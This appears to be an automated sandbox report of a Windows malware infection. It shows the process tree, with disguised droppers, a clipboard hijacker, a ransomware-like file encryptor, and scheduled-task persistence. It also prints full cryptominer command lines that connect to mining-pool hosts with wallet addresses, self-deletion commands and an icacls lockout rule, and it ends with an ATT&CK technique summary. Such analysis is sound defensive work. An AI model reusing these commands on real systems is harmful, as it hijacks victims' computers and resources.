                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\963A.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:8548
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      PID:7976
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:7664
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:9780
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:9760
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:11080
                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                PID:11256
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:10212
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:6448
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:10316
                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:4932
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:9272
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:9184
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                          PID:4020
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          PID:10460
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:4168
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:9916
                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:10524
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:5268
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:2420
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\963A.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\963A.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2940
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                              PID:9072
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                              PID:3840
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5640
                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:9412
                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                              PID:7044
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{24cbb9f4-ba30-244b-96c3-235b8f2f4823}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                PID:4052
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                PID:8948
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:9896
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                PID:10160
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:8072
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\pqdfxfdc\cltrkmpp.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\pqdfxfdc\cltrkmpp.exe /d"C:\Users\Admin\AppData\Local\Temp\3E03.exe"
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:8132
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                      PID:9732
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:9304
                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8816
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:9056
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:9388
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:9392
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:8820
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:1452
                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                              PID:5320
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                PID:5312
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              PID:7620
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                PID:7060
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\3f91aa05-84d5-446b-b842-210976c02746" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:10708
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\22CC.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:9568
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22CC.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\22CC.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Modifies extensions of user files
                                                                                                                                                                                                                                                                                      PID:9820
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build2.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build2.exe"
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        PID:8332
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build2.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build2.exe"
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          PID:7384
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:10176
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                PID:8548
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build3.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build3.exe"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build3.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\0eb684ee-dcd9-49f3-b0bf-52dc747caf46\build3.exe"
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                            PID:6148
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:7572
                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8792
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                                                    PID:9060
                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:10620
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3DA8.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3DA8.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:6608
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:7716
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:10596
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1A5.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1A5.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        PID:10968
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:7704
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:8588
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                          PID:1860
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:2916
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:3596
                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:9004

                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                            File Deletion

                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                            T1107

                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1222

                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                            T1120

